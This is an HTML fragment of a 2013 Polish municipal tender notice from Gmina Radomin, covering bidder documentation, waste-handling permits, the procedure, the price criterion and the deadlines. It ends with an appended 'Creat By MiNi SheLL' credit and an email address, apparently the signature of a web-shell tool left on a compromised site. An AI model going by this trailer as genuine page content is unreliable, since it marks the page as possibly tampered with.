<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokumentów potwierdzających posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,   w szczególności koncesji, zezwolenia lub licencji: aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w Gminie  Radomin zgodnie z art. 9c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2012r. poz. 391 i 951);  zezwolenie na przetwarzanie odpadów zgodnie z art. 41 ustawy o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r. poz. 21) lub zezwolenie na prowadzenie odzysku lub unieszkodliwiania odpadów zgodnie z art. 26 Ustawy z dnia 27 kwietnia 2001 r. o odpadach;  zaświadczenie o wpisie do rejestru, o którym mowa w art. 49 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. z 2013 r., poz. 21) lub zezwolenie na transport odpadów zgodnie z art. 28 ustawy z  27 kwietnia 2001 r. o odpadach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radomin.pl-BIP-przetargi zamówień publicznych<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Radomin - Urząd Gminy Radomin, Radomin 1a, 87-404 Radomin, pokój Nr15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2013 godzina 12:00, miejsce: Siedziba Urzędu Gminy w Radominie, Radomin 1a, 87-404 Radomin, pokój Nr 8 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com